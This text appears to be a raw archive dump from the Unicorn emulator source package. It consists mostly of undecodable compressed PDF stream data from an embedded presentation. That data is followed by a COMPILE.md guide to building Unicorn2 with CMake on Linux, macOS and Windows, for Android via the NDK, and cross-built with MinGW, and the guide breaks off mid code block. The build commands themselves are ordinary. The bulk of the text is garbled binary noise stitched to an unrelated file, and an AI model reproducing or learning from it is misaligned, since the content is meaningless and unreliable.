԰~oZHi`(:|yxo0T%oZi?Ahh`HZgJYGT4ނ}܊z[/aI^J /sWl= "@{Ѯ_C !(?3~,RБuyj MKuu UfˤI֒[}92204d|BK*#RkF1=suz XiMox֑rVD2gB,^cDi[U`l}`!M5W<JWOPI:i Y "yː!Okk%y?+‰V.l3�_?;\09L_ *L TvXxp&U+VI_1V51b?ld͌-qCk.ə}Y Sw">󵢨 ԅ΀`jxDփ4IWߣ(t# nBrE>D5ٴyWwU[5̧ !S.xX/Eۥ)=Rja{KzT=і&(jeϋC;V&/kGJ7+xk-fHR�̬)Y9:MUҿZwGdgdI#iR]tށ{óQ(bzl=m~P]ii&,;|F jDFUb"ÖObapz(QZU gBhb6>wgm9]=->ћi&:\JK: YY;{CVK0||%7̩Tr卓}9t8|8eVQ=y#<f5g wK%齅.V j$G 81eOÄISMcՂ֣%u×gގzedF1n& /c}->.GО$pb'>";d}#G"հ&'f*ruT=G1 .nf�'E+nG] !kǼJwNoK@gTxĈ?^JN"m_(cJǛw7Knk;cn7r`ՏfZ\<c)` #l+u4gg v\'6K~$Ie5KXy7jvCS68& ^,8;~|7~Vq{SВ[4)Wlwj'iC,{^8<zJ{\@�`R3AB#ǜt>a%uE* C't28,-YVs.(#}t\." ~9nLC|KnݺRYʱ �_ⵈmw~IpNQ*'˺ 0D^N *ߵL.s,IJQ0 |%3v l/ýbü.EyAz })Gni?lZ ƿh9Yկ_}K&Z&5vL5t_W&SN FcxKqaU#smgyKn]lb J@iW}yNe~H$|9Y{h:k/b4[4 C썇�cNGd=Ƙr ʤ"OWfU۟wsWҐE47$';cvǙu#kHhF}UɄ짝N]GV Xm2o3Z-[|ء`Iі[;+?joWWc^�yT!{j N3�l$~֍weJ0U2~Yn ^&4zdd\LAO7݋BȊT7=wS;8Z?VL4/`?d`aM8b Zt0¨rdѐu >{$tiaqr㚋Θ!-5 wv|tfPL4H'2e0gsnoҡ!Q?ݚhYe ]nzҸk/DD\jVR:A@\jVϗ]ex/Չ�A>hDBPMFIdȣ2ē w F_)D`Pg5ZnL)myG?K GeSL'&d- x1<x/%[j'X)S^S LKRrX ̤b)*,Ռ>*iRݤ(e#z ]Jv2]q]q)ywcœ,a54&~Z#-Kt\POM燗.1'q$6/V1*+ZS0EJ>cBkYs\ ouA`Qc׃]_8w(trv&ރ(YGl6* lS`g8?= Yoޕ'«d?q0\ ,cat/70s?CĊ"eo&\9 @ 6LQ Z==>[M:}N|QMGFDzA5Z(nŵu^iG⅝k󂠸BBʚP`Iב1{ 9b#YKE|h5os-ɅXݲTx&-rNBWx~jz =X'1`ncwsʋYf-;X�@h qxBv:ݸ0xe}n4%UlvX&{q3^epeWKOq{Xہž6?}jTĕ,͵yfPIP({c]ʿIyi#'5W}~奈E<dqÄ񶰷w!C{W):2=/pͨEuƳ?)_4I"tݕ u폻Otwa;x27rR!yE-=ۨNJU/jekxYQ7&G6}9j<> 78 ۱#<gc4/%2٬{N1u4nNݳBکq1!׺Ί57XeH[FF\.n̤\i]%v֌sva+obTߌ J죯ա.LQgq I;5x^4iF+j_&+MaO愯+읱+gThǮDڗNع[ġ,p"k{͌PE0sjτ h Ctnj>v{+D\BԪ*v~ybWk4w~5j}GJ佷w7h?Rk졽SUթF\SSo!>d4xOXm4 ܗ$K2;37xhtm[iklvL\U#ӸsZQ_*u 4o3>,PYny\Lr]'\gC%Ŵ:ŞSUm輒\sF˭|W/^nGP;F\S-�ߴő4|ssQR6; /NprWO9LnlO 7'n^HxewX;dG .sB$#QGE{vy>� /iEdC5۔'beO*f4[]88T<Uȑڿu{ןZB(*uLgJQآu\-UJ|qΫڬPD}LK$)7HL[cuI%͔,2) .}-ř5*-=q؛/IFIqiy|'BJްe)t%ͱPlsXTiξO>XP4m֌aH- AަH%avE01Vq܊TǠ6v3x!VJ=W(gC{vnO?}YH@L<'QOю}!+y:Iֹ^ڔ;%ƼkؒY+g{.9.i"3 no5 �M=w7m݆jn_]t1Γ`3 #(]Z8VeJϽ Xo X'GվCV!\\kEM)0Dt&b c =E9*4fAdAM:?_T %qb鳬^wEx>HrZ6<bؓ0,4\ƙ�+٠#W#n??J;'{AGVOSHr5 C_oP ek>NI%t )v{2+f0VdϜd yl#똌{DFS.^3xwZ=x(9Sp˕o~Xj-Mf#D6&[ JDCDEeؼ 6SN(Z:m�RrS'-a/ajuiOét8"I흂+8qɟݎ\<+Yl\ [LiLۅ.^Rymٛ!NC]c xt "dlGko5whhԧz@˝e&B=fntVusô.M(c(g#eF2)×b*d`?'b^W?ޣ ʩ"BՋPOs޳<N6Nxb _ͥoг[E4mwEMKG£ @m#W錃Բ"dh7ُJj27DM!E_&'PnZQģS쿩t[0�q endstream endobj 394 0 obj << /Length1 1330 /Length2 6678 /Length3 0 /Length 7594 /Filter /FlateDecode >> stream xڍwPk-VE(@B$8; (N)mXiKqi{s;sd&yϖߙ03r˃v`8 '6 23AP_0. $A DaJ@/"||�>>�%ha`."脔�`grvȻ= @@th 0_!ؤH7 ^^ooo+( �` *t`A Hop@!`{�.kt?d?._/_ @{{ 9 P0@WE�a_D z!Pw@>�xW_!= nHU"0w]Vᮮ`+?%&{:8@` _E<xawO_; ��FnF_]np7]@@m �#v`G w0n%ߝ|>?Y A}/>矊)(}��naa�8O�0z@_isDd{צd�ZvcT #r+>a>/ov)W;!O(0]!P?eO( ? A<]۪_y  ҃ h7}apЯ �=<w; V A�/ sy"p_"@_@{'d~6Z{O=׻s`wf n/\zV)Oͽ2*y4ƣ>V*{EN7ԁD?َfj[.lLNlpɭ\7vh0pOMOpԊj&UGgqV!E_NR2b"i9H}?|"xΉLwIeFNGT$, i_N4"[g�g2ޭe{ƀS-P d<FTQ;g:̣ ٜo^/=9ZZ+| &Kb 啋339оߍ[ax^0 yRI%+! 
ޠ6|i"2)[U+8y[Fe_}m/9xx6!ng=㵸/) \IJ\uz ٔe8JfPr%Cߠ5kjqRfabj:Y|ƽcJUnSܐKPE% ϞwPbiHO(ֳ1tJ_2 @߂xiѩ;7<+?"Yb_t9ϯ?{1dq&Tn,Q#D,uw!e;}?{,Kr�|⣎E9NNPpZA{LjU%6k|p˺` k# fihBKIL�ӫX%K'O<FoX+QB__]Ɨr6iK,Caw@Ͱ߆<a,$y\#Ut&V*Bep<6a ;J} $@C@f�ş6O3obNHt_HL݌Ҫ@#6]u*B]|ALy{W =Ed>kd1R7.�eQ^vS|9.b4K \| Sh05{(>T>0 J0Ȯ0U@ ~OBEtQW +uX'ۼM̤[˒50|!ޱuhmЃ1g19!rAK8̍#&l*%xT?Dp5k&N]l3ja/+!6i`hnI2 0m:??."ϵ5Y4aH5ͅ-X_}l&"ea 1If$^|5(T7&4~~Ւn4M$g*5OZ*3,ei8oq 2b{I-VR\p$?7:; 2s&V}쟥\ NBS>:[@|kLtDqy̒Cxzs풾>@ЩVEr>}u[c�]A&&Ey, >{3ҙ6ֆ) Gm,HhWq2`'i\Ԥu0U*wP Oi"ܦEL~[,fԶDȀэ csl:Q5R$d"t_V-O{ڪ'=d[@}KhJάv 23nfa$jKKڐe3<vw: 1녨"*(n } M_l?ph#}WN84>5)dJ$3TE>#&q6( (-MG$.|6nJJb|TIi*΃-YzO&\.ے/v%S*W?=I ~ VvAjQ:KZC>8Бry1U;)ccW42ۛ|wSOܗj8.G!u!ơMU>}a lPw-d-C'zџo_ sOp4�񄙙 gCOKP, wÎ c8y7jk*⟡}ޭ$K L�Ag"5'xJEIJ~BckC@-{GTUIDգ\3a}~S :ܮrI4WBr("TssxQ3^z`bU@ΔRوG&}ݥ*iQ}�YF92g8enWO3d^kC}%8UzXL}Kue-XyACAmlԅrđ@y#;~}j}7QשG+5ל!v:6*�wJ2}>8[Ǟ8ȥ9 MSS b,lf堖J�M6)tBԯ|fCjq?w~uc޴Єr_^V lgw\ĐN֪ȲazSٻ-ai;^xP(cf,>iܶl$^1*un* y^zsAUP)C+ ϕ>+lK#srq=Xٽ9r {)-8kR iӦ$C?/Ic2)3pspKm;ݴHǿ[ c<m)U-?)gziU(L}=H y`O:Jhu1+G|hͫC~ L~eXS}n+N'[MHb|yҠUQ"9s8\ N\" W$&b6}WKr67qGucA>&s&ܐ kvk#bɧD/G1<cGRݴNj8ɣk YqXl/[Q;,jNXJZZ(x:_>Fc s;O] H¿n\N 2 EuKUyOW wc5F =*dA#1-Z|{˿t( /m/uM2;or%Hy*u_vD3M4c:[z@tk/yq@uO4V._yr]o6RcyOa`O2!xZD$ ݙ6A1;R1o1R< aM [L9*CJ&Qf)oRP||͊8P-Ō٪A_G֎f09]nJ> ]rRk[N@xYB*GB̯۬(9cDrx\$z`͵>tff՜ <AX|qj=ɦdh&1IwC= .BT>-XO_8vڻa\fc3u r< g8 ^KHwD;sB{ˆb6bҐٵ8eNA&2*ES񒏗7mܾ2yce7f.#ѫVZ{,ٸE5`u%kN&Lt[zR4?pڤ5c" pLSCKky܂^[1V,dXgQ'ͺ~>@X\y,L1@IITlwIi%f5fEsיc􃪋PS-VֻsY{)'P�2;Tb$~䐾!̒Ҩhj_Qo�؇QވA(LIDedǬ3A@ ƩҘJ4K>OP'>s;Uu\St%:f[FO= neT[b} W">!_67N˘VhW=UQfk.%uVVV]m''s"DvѻRcc i\I3;eMd1)e[~W7•^?8Ϫo!#}6FBnC/%K1 dAs$5� /Ș1S:Y.1˷#!Z+d-!ny޲Ƙ^t {%,6r4<JH:,Bj:.P'GUj~k}&YLyȫ0|Rq/m R^f]Ξ=U\`J]9RFd[MoX.u@V(Mz-'qrWp-SS+9^e:ԥECtFg|/ (zɦ:fwiECq\ڠ;EMH8=zơA!O�||bTeNNݒV%@RVXE`[7*Z=۵_c_[kr `lM=_<gb 4{A#ܤYvLh (揎\P!g}E!me8Rd`ACIB#/�̜!Suj@\_>HKI1bL89c8o"F+ PHyc5WKh/ނH)\k9(vũa‚<_JoWf\YmɛDbo?<gH᫰V 0+;qv+Ue~ƧJUZ%eʯ\T?roZ?EcPзbNoI\d7&E+ҧIWE>GRؔ| ߠ "S ωS7Od,L50$ŪeGxzD˽'ѷ]L7#G`&aH�ƭ9 4FlQbܟdWM-.mco ?.E)ɻ66?4M#7'~HKA{elckCWcUݴۑ),% _i'"ۺ+F&Lyhj{aˎ Dm,a79kЭ4.ejT@Xj}IlHZ6.8,l{=k@%D&y�`(.yab$u5PѾ<”_q$錩kneM0k a#sFMU*b:; w6)$D &&-%9`Q~E+i=h�ftB6YI$>n'Z(.v2k\:b@>t A'z>. :F( .:XY Y m#`ݔܪa))Q%[x%c0SIS" !M1(6 JI^'6dg}},iN7ȡС DBH]GP1D )Ua)+"vQGx#7 ,[6Cg[H\t.AC0T�/<6h, _Ôi&GqDĝ̐#p }1�kDk; Lܡg]΃d1CoW&l[Ih`RD9*ߚu&h(,!nF5O^|toD!jԀBl# :oMl5Z DQ*E;k<M "ј,vĨ <mJоG& :`NWćbG_>_6/`NUnJ`izFX%iY{LeMT?FLVZxU=FXځAٷ;MMd{Oe$֢\}1ehr~b yb<>`!xP샬stT8X݃,2e]v ǃLkxW_9U"# "ӧ7:#)sҷРoR~_d:r\tjnLԙi .41, COtlŌ_,fS_LDuR6"Js#xSo.ݚٌHe NUh| ,䥺�6W (@!+e:¶ڗ15qCTv9gEy3 jkKCO3*WQ4e$v?KLF8 HaKp4B.?89ke1le7+2J/=+.⤒r;i6 y$醂l2\;K >J8M;fNn$͝b5}CAUjuC$Ȑ\s=K>avK  Ī7_gEc1%i`5]}%x'H@tGONyUyS3d!aNn?ĄcNoQ5[KR׮`4Kzާb`95)%M^٘H>dL񣠰{8D߻N>a%O}gDDlZF\I Kme0υQV|_fS#A*~Si;Uů�~ endstream endobj 396 0 obj << /Length1 726 /Length2 13005 /Length3 0 /Length 13600 /Filter /FlateDecode >> stream xmcp-'uбvl۶mg'1vlcctѱ;m=snݪ?cs<R` /' +#+ @]J]ĎHI)4$L@>6tXXX)N^. +k0ƜErst[E]ݘ\܄R`k d+*Ih4@@dP�\�KG_\M=@QRCTJYI )ά!0u�(3�v 4wuv �";EfuOĄ �f@+"tutpl?\GCZ=@#h�-.�uSqYjj,1D?%h?: (-@n#?j`g,.)!'/N?-`hrULAR�+]@�}y_#sad`0�Xy~]s7ߪ #,:ڤ ,2Ѥ_d\G X[_j@&d&}%{LfD>%4\.!ZRit gosu\] V;s.Df5)o <w MkH ܥF+4~Y|Egl]XWfFY1/\v$}-.ԭ+)kԨV.n'YPŸ8]0.Qؓ%KB)s}DlUc[AL5F5JF Ƴh@b04jک5_?^ҋ o#I3.Y!۽Ʃ a�9*~*jFɘ |n$3)-y:'K{R4(VIyf;bu!ɳ7Z|61t%M7iI1On4Ո/Jw |Z0; !PtRdi%tq3[ʦ6D&=~ng?0ৡ&ۈt dшsMxltPL]VU<T9%{بe#]O:k)(*YcNme *TƬ}k7;mrN6aeÕEItb"X*;{2y.Ijlo6ο;]¯Fs5CUo'gݓϟ/ѝ$F1\Ԍ,{ B^],߾}gegD5pͭ92$ pjC/#DZl6xtWRl(}wh;v%>^v߇/qs ϼiώ8C־C2T`B`^b !GHLmJk8ēBZL:5qbu@g˹V7J+{ƞ+8 pct`U3s,?״woߐ'? 
!tLucye.'& Jl5Ɨ܍?*4-R@B!9835}Ny;gZUJHƯOtޑUs^MK>qn^B�4PU:]+ z7Dɶl; ^1oF G,/嚭iz8/щ{O:N2tc$czws)~ @C1qFn1 _)<V*MҖb(NJDv߭Ӕ#w�)nlWD[#$lυmOKs]a\k#ȨYgՃ\OsX"|wcZ۹Q%w@8՜N&AMAϐDu˒k%|yN`ٔWT@hZBB^8<$cis$4:сce wc B+$≲uSD9HDc䭭|EL~Q]gϵ좥e %Z³OI?3}O~+>–83:,ib 'wzsSګ>ycڪ>zgmLM)A5h&~mޏ<JlyxׂYv#ȉ,f h}t1n%uia+\W\3U> Nև9HZ_Lcng TluƣwkÆUrf>H5cщaؓ``fzŔ&#2i�*' nQ91ZL:q6v\T=Pč7ƻiYDF9l\ Q:4B棷C LTn+N4`85gqvq/"Y٧60]6Tc#fV_Kwg5 J{bv餟vcLM-QΔ?fsTz`gYG)t@JXd2=DZn!&"8Q:Z豟ĀJ@S~Q3|T,$=hhՉW<>T&y0P| +U #RU,N{ 齆ꩇY ~aM}IP Sۼ1e$[743k%G'T; QNo)bܔƸ%]sպs$|)m46KID|o!.C:<Kg 2m1 lhI)a}摯-֋[&;HoQ.t# bMsd,ƞr228mv0?Ixpy'@'io`8؉Q VȜuSAhQqS6v Y3%UA:ħJ_kLc&=lkPC:=Wc*0ZjuQV>Dy+ĝ7LC^I2_4.IR²1"\ӱ :頩AAgq mE F ?Yޙ=~ǽိ=~I.Pt\] hL'n2YD|յM+GG.F>+kVH2H+,uZ8v, UZ K8Y[7B[XqS(MށJ4mV!,Zo?{- {B #9pp8u+ mI[[H[]sT-x қO 8]J$i'bo26)fӆ )uPiGfH-3 Dd\n=\v}T UF6q>62r˛Ⱦtzj%IEa+8yk&Ᏺb5?%,!Im!lj^?:fQys^dS bh8},NjҠztQUs\z\k?ތHWwmS_p)^t>ۣpvTUߋů3 5Ó'菑v5 }m&LCoFA4;1F_w'}9k6@e]syY@݄ 6OUEAoB0d^=|gJbYޞxfd˞ WAV@=˼5JMnMlgmot.Ryy �;@Zct.V$0'Ӧ)LlZ XIVU,D Գ4c-󖏶'Cw鋩+~%[S VN뢓AP#g2JuK\#ivS{s%{0% <ą} KRaL+8B,/e+[+yP',n?FW2k2!Hv%Js3WPqd(GI Ѵ$mٝ?ݥ dW,sG\J,퍚T.9q o4!'1r#vC,xP~VCk-~䦶>87?koT7'Z&[KY*Ed h<mB)'ArTM*cZ: y4^T$X *]a澗ނCe@v 7\uvvMcauAn"6�|r^ {Jf|3ߌ֗lz߶~2G켣}̮XDx-w&#|nR~c2p9}PQ[4lc?TOEB=|f[13$D2.1}ýb{iQh}ܷ>,{Mmip))kZǽ`Μy%qbYQS^N=�B)yoi 7FK}iG٢?CC#I+zkz爤£PUE]2G8Z9Qȱ܌* ,y)gڎT+T,d+5xћk3j BRPeU.v߼Pl) Q®nb}KyLRA�b^<@'2P _*'@ޟr' Y[x ^*AGBTH^ucJir@38_ 'EЇG/v߷EAc> h0BwFTLE]J6WJqvMQN!*ڈ'o$QcM_3񃰚wvzp+ Uc~:I] gry҉S>y\s.Z>f{>:mLBnkms7,p%tg&į FO\i"Hw=41> 7<oAN{D7_O:4~-u|"E5{՟mTDzM 9H>ELN>Q)+ۚ6gq_!ȱFzT0"VL}ԆD ? @+ne n΁<uxݵ?`zO+U6(09~Ive<5`AZ{'Ԣ`gȷ?l*;].V%|O в\:dX 3٧ѡ?Ktkjl!ki_LXxA:e.ϓ7ٍPXf7CBfx4.y�xLnݨO6<ZI_'A�@NMF\cBe=&hBDFǧa~:jb)[H 8:]JU_fV8`ɩ L?s[$!]~j@aηaCN+.']%`:5sgk2Ԇ⸓g:‡Eajqe҃Hb,Mz8?-9t-_9=Pɭ͍#Re")ѷWOg}^lnϑIUH]fJu-oZ ּkȰŮ&z@i+ ACSt[CŴ}QT*WɛjRԚj[bu{27m*L%r3NjA*>OlBp'$8�JO+$w0Oʾu�<V\?|4S�ݲ ?Y<ҮȜ}L=u9e >fU0�'Jq7u4 .3fvX=.ʘyWrNnm<gOvbD la~k:g~k1plS4N_kVp%H&ߒ7ƺ<Ĺk#Г`8VsDASP? x4]fm~<\ W&5['6@_[IӍ@Ǖ@g!.&W}{dertBھ~g \J8B(IMt1#W8ċr??`,ʴDso?Ef>_bmDlֽp ƨ`[ޓv>{!TTM#tsf# ۩śzcHF@&O3΢e¦mF08.iQ__'?wl".y7�{(Fd馧I<&t@ldWIee6luL7- ^UnzyL\>~wmQFCh#1q2>Hiq}(2ױgdp>Ҁ:,1^Kn| ˼/r&A4HIOt!!sNw m.⎁K8vt�9A%t>oNɦ}0/![3/D ܆Mv@IΔZSXӬ y"f96l|lǵYPȮK|TՏA `6l |Jn ^M&S] gPcvw1TZ3xn#8M\jz/ -1rWi癝/$TƂ&z}/'AJ|o# Tt|l/1=/ȿVF="<+S eB:]X}wG?]{]ւ)U r,{DRUvz@>C;uԊqKk/"h{\((+5di7bd"C٠שkT(9iCѤW_GhcFc\1ɠ٧$ GxdLdxuiP|WM?*~y1+5S_imGuTd9 hifd?0ًvXH\ܠT .ϻI8RL!::(jQ"5i79NymMش@k�hvX4 "ZEOT\j4udUv:gCO&{63ZIJAqcB`l#<sZIƅx-nƍВMc5nݓ_-CYQjPHN"|a.V2&N�/!ƫ+Yu y:ip#_k` vʨC A55im9O#:!#%;*pLۼn,JlK~K߼d4~e𸞮L&ڗ=Mc@ fs̕�uTjoF@Ʋ\^Z!(OC2bS:\ceMf-Rg0e>R$튶J_lq*of[NʞG(&)c1P TOWdnAHƋNt!w, p͜V+k ?1`SԴd!v%@u#~̯CAԳ0[WrQ8*'HV٠ r>D8di{^8Y[[xe <K!vFe^3^p0,ڨMYp#isqf18 q/בz!Z!##ʹ8'`n5C5(r:"KH+%(NlՁ,nհEVDZEP}g vx6.eS7jI0tS6v#os;b߮u$(5NNM`Ta]Mzد9bXǀk Hvؠ2gz+[8rƤ6\`=8k);"Eu/Bu,";V,D j!vD!y9%|qpm1M<qLI\e'7!{=l9'z ҉MdqS|q(|_'A2fK08Ds(ìI:Z]X�a DU/T0e+Cg!]ɽY@@Yon:Od Pj/mEZ'5h־~ΞTdis`*Lk9yJ(2wK?,7m$l9#l!E v'5M4{+TRpf0F9Py: ܻꗈ Ngy!G;vrheZ~H 򸪾z _ 3o[yTjrl%x#_:R(_W~#q^%{[[v9+@jHף5lX4el{l⳴.XRH'(oH<)_Y ofQnXŐ%eq<~yP:Ayek?k!ae1rw{rQ1РDa᳸?!.odoI" \&ɝ{5|WmE,@Z<p`ⲁtz16~^dHРGҷ§AmC|лwu($iV q::ŨA0Eq$6~?la:wk3oN)WID%3>1`uP+McEe)$C T@ٗM>%+ѯSQoi`H.SPd5" { /'7fհ5쨵j& (ll5XX(!345d@_|]]-Gn()9.q[a#:lVh;%7p2bÒJVC7s=wۍ@^pъ.o/AAfk~#E3DpJ4a\P{{/5NVffB7mXLw2M닍tr4i ekQz9ɿaUnpIVzDZl�*rϚr#}) u`" 0f$~j ӈ3WBmJER.ڦẏwRɞ Ljx!UnnY## A\ѓ #}xs59Xљ@7[*Rup+݉7xEb6[rN�̲=%O@BUEI|`p}%t,NDðz 5_ID9ۤb*&C@�0yU$zɕ�l7`BX>7xwtG"2,�Dzw$Tƒ((q2囸 1%Fqݟ&k?`iaEE"d3͊+! 
RtȲit9ڰ}; oS q<V߶'UQ.**%h9~7gs{^}%8 zܑL:EA]oRo[5<bҐhbSxqMS3uVտ6"LPgZ79Bn8#V7zxwqP;m Q1mTILZ!NɛD3 _Nxt =75X}D#f4Yv57<hyRLLg\G/(K;"9E.4&مhU?k7-'M#9FQ:R&Ӊ7@~JESj gQ"\9q<ZՃlojӊ[/eR8qf ߧ8k+%~jah*Vg|DW2MпS74F z,n=B"#9; -yFԅ`#w݋a~ ZlGDC|wT;Bm -ڂo \.ؼ'_"Ѭa]&"CM ]R3f/J!($U:e"'A\Al#WoJZ<+#Kc|1sxN3s{ԎqΚNnd(tf#e_kaaδD� ~*j[HHr9Gw8ˁuI_iKSYlIy3qԢYhiF40MXǒyӑ+GS=zUw@ '2 eo+NhpKM a'=Tfb #86A\)1ºgKQ$wó]ᑸtWcPVLn]ohZzR FUpctd@Zh©ƦH)oe#Cq5%#mlx=? CM׎<*OvI2S,g)811 a;gI]AW3 k2^0,2&t:>\g4ק2el5?F;P߿ FԛEc}9ʌ/źEZdh$be=э7 |ExAGtCqf7ci&޾'u(aުkb6#^PQW@vq:IWھJ!b hvq#ZL_u']}FNjH� Z{ 5hEzdQ7I&Ǒlw@8ܟRoB_ <:r49?H:_价ĬHb^mObLIɸtxGy &M TK í2',M3|dƫY1qU}TO J"E:qO [TSRK ԒH*Qd_I:-__ nH~ίF&ŹkS*4cZ;mfs<}X|!o ߛ~4곟q_}C$nuEXL:$bC;MM~M,*(7eDkvn[eʺ* sA3UQ0Y4"^%~C2y2E%Sao}y+L?nJ!O="Wg 9"ʸ.dr2Uh]IDb{i|"~+Z<N,uX*ngܷW9)GD?fN`(2<Xm@XCWEJ{Aj B!wC^)OWuIuN7IE|JLoڞl?4[ir11iӰNx7Cc]AVzCUTPiE&^- @sK2Ørod';]yA, A܈ʎWh 8jp0 ;/)Yk&eK[wJU_nT9`35Lqbw-&A:EOY*b0;*{ ڟ'_l\ѶB3ʙ%lGՋR It 31FR}C?C^ eqSƍish7jwKd'lvӔ9d |+<@+xBdV2/ z#x}xݾdr=%zslMT+&g$e<C7K(䐭5mEYj쀌(_uSHت@V 1UXEVYTe?ޏ0$'-ӠFQbWOg:;f+,Xi]df-,ttPC*n‹=.l0β}wSϓ/t"id}m.gEW8\'ZR\(œ:K4&olPrjf%%t^q~2gT7*]6n?0qqF>@!qbj"N\NHk%r9 \%bXh~TPvS;p3s֪|Kw ҵ'+ȃppa16ql|nݠp2U8vtJCq WMBU]yB!=0-$h]S'ݙZfĎ*c p'qv<V{(!:o)^O^n%|enAM*9%Y!7v}@q=U0}~H/+wt18eF[AD-&0EayvB1&K1z+>ԃ>T1RQ ro .wz}C3#U:+x;͹e&Meǎ[r$),M"9דrOsN« "V=%ǦP\y!ϑE2Q%MKo-6}Ch XemwJM|Lp^ B|^FܣlYn 5S â`rNgmc 1[%KJgwkIr;ʎTeInaQUjVW=ƳpdLJvqY`b<FnA U|Ss Lb|faS"yգUkC."[@<g9::�5$آ_.%pxV,zJG~2*<.|_p8pYr .z?P} sbj0VzF\_s(-:cAm%&Mps�~d E!U%H$�FUw 7!p;B"$ټ[zt~VeW>N8bS?Lcױfa8YPۧnz+5s  ~9sc0lcvxpuntE謎.~xZ ?')GeV)95C[}f>1)Ԣ&9"ްVL솛SX&izv|!Q AY0=*%juKbFzq\v XJH*}g p8[,1N+c0 hULU)(M"fz;g3Ed!� \)$>p0ʤb#zLܴYgP{h ?6E�bv}a8_:猞Ao'XJp�>(xy}i-xM{gHS!h#!:(G0A.~7H盿* tJH13J!xn OS4Esr,^L_琋[*>h:ni/gA+uP&$F[I^򚌞wԁmnF]䤣w]}0-ǮSo)ud?sAԂt[KNח5N_oA endstream endobj 398 0 obj << /Length1 726 /Length2 5815 /Length3 0 /Length 6408 /Filter /FlateDecode >> stream xmvuTk5t 0t HwtI�� ݍ�JH (Rq}}׻ַ~>g?g͡DzĄD@�SMSS4�ps`Nh'R X �S@ �@b$�5O@ ,NPDx!n�y???e?_m) @�.p fhdc20h0`대C�pD$�' K~0V aih`P5S8!ڷH-k:!�___O$B"&!h3$7'?0ҭ [}�[P-0p<=|0@ C!NH[GPpNpD? ӭ*H[@@pMx� jGℸoàp_a^+#og@QSCU5K #][CPFNV_1@s}'4 �##ez $`@LRJ #&B|Q(뷳M0X� B4 vm<x_{Gsy; olnPfs?T) F3>o7|QUʥqxûLG ?y"&$ RKv|O8oKo}M"[L١n\I:7[&k+D]fwʜwc˽|yweˎj yVJ)wh{@B֙sK)OĮNXIֲyKSh<.3xašV쵄Gzuj?zᨘd6 z+&Xe?1 Vխ{d]H#0 1>"3{:ǟ(~OxmK&aoTKd(+(yc/nyز}D.ː=ź2vn9[tk:k:zM΍=</ʷ~埢ܽWm7 9]6?o79mH:iM;řӗqXBJ y㤏'`"T/dok9 x}p>Ohi&3QWQ[i[#cXwW6Ym5_/i*2"ņdQCTtteb PU3ݕqI fK!nI,ےFZHh}~Р-WKolʢћx:"`^4u%uS½LV c$ώ#cmњp]c)g}xn.7;ÿ{RnJ<1FX#G]$ c 3OѠƻx_}tc#Z԰ot$鑹R-<Ɔ}E)ϝj`&acV5Lf8fJ\uG*B[t)Sr�m67'CA%i!E4ns%�KV[*6#Ӧ(X�;r5PvmOI|8Gp]`0,>^!+uD3P\m5i+w7\n!`?d`t{׊>9~N/eM(y\"OB|=6т\+RHW,3RI?ѣݞ |� +]d>#wMmk죑1b?(s|fZUR*5ZWƫ_wGb6>s` $6h?y+$\}~X!'U\Nzф=~+؊uczjxվc|j"<뾾'ᇥ(ae{{<k_@+HVs+`)؈-%%lGl6^+*):F�-8JvNA(JBW ^*O6:;<26Zb~D\wPWNFu+r2^NVb(XYsSteBjkko }ͳ�? 7[XY+ud*LݺC@ѬS̫ h@q'v<&nAa3@ed[3E}kVo̥|0ۜ\)"eW{Xu VK\i"%qx� rb y ƃ/+B FCΟ\`q;#Jld|ĚĤ4R{z-3+M`9Ŧ6c3X+%8S|2 f&qI V;ˋ֨w^(̡wRyAs@:jkk&ُ%}.)离*~�-vWJ3s#OK-ad :}Uu<#-z$z9v! LV`2gC c$cބ{Г.RAge\¬gk杰;XAOGX];84>r\ Mapŏ})N �oB 8�n1gv_lk<3eaDJ1ʭg͉$$1v8ޟBa_}n^|UK5KFW׊ xXEp)BTC6p?pv| M:x~F+t 1 >X۲Ĺ}F|[]n mn4U~*f935N[ qQtetށzʎQ<vX6oTʃro)+v8s OKx U8 ZIz#3;ܝdjYsfJH_]Z}҄41g^%ά�]Ek[WiұL +3U[t^ bd5!wQ%/fq1WM: $Q'Li-fL46E-gH*o$ՠ}B} 'ȜE} a`‘=N&^05=u!kʼnL2oKDjbRsw Nf >\#N-pxċ(cq,Sy`;URU:$ܭq8EJ#7EUj;5פ.jҢғC2!ץ&s>[QՂI�Qr8mFS߷,~Z�8AO(3~񆛂rXސz=? 
[Binary PDF stream data elided: an embedded LaTeX/Beamer presentation (Producer pdfTeX-1.40.16, created 2015-08-07). The compressed FlateDecode streams are not recoverable as text.]

unicorn-2.1.1/docs/COMPILE.md

This HOWTO introduces how to build Unicorn2 natively on Linux/Mac/Windows or cross-build to Windows from a Linux host.

Note: By default, CMake will build both the shared and static libraries, while only static libraries are built if Unicorn is used as a CMake subdirectory. In most cases, you don't need to care about which kind of library to build. ONLY use `BUILD_SHARED_LIBS=no` if you know what you are doing.

## Native build on Linux/macOS

This builds Unicorn2 on Linux/macOS. Note that this also applies to Apple Silicon M1 users.

- Install `cmake` and `pkg-config` with your favorite package manager:

Ubuntu:

```bash
sudo apt install cmake pkg-config
```

macOS:

```bash
brew install cmake pkg-config
```

- Build with the following commands.
```bash
mkdir build; cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
make
```

## Native build on Windows, with MSVC

This builds Unicorn2 on Windows, using the Microsoft MSVC compiler.

- Requires `cmake` & `Microsoft Visual Studio` (>=16.8).
- From the Visual Studio Command Prompt, build with the following commands.

```bash
mkdir build; cd build
cmake .. -G "NMake Makefiles" -DCMAKE_BUILD_TYPE=Release
nmake
```

Note that other generators like `Ninja` and `Visual Studio 16 2019` also work.

```bash
mkdir build; cd build
cmake .. -G "Visual Studio 16 2019" -A "win32" -DCMAKE_BUILD_TYPE=Release
msbuild unicorn.sln -p:Platform=Win32 -p:Configuration=Release
```

## Cross build with NDK

To cross-build and run Unicorn2 on the Android platform, first download the [NDK](https://developer.android.com/ndk/downloads). For newer NDKs, please make sure your cmake version is above 3.19.

Then generate the project like:

```bash
mkdir build; cd build
cmake .. -DCMAKE_TOOLCHAIN_FILE=$NDK/build/cmake/android.toolchain.cmake -DANDROID_ABI=$ABI -DANDROID_NATIVE_API_LEVEL=$MINSDKVERSION
make
```

You may get the possible values from this [page](https://developer.android.com/ndk/guides/cmake). Unicorn2 supports cross-builds for `armeabi-v7a`, `arm64-v8a`, `x86` and `x86_64`.

Note that the build is only tested and guaranteed to work under Linux and macOS; other systems may still work.

## Cross build from Linux host to Windows, with Mingw

This cross-builds Unicorn2 from a **Linux host** to Windows, using the `Mingw` compiler.

- Install the required package.

```bash
sudo apt install mingw-w64-x86-64-dev
```

- Build Unicorn and samples with the following commands.

```bash
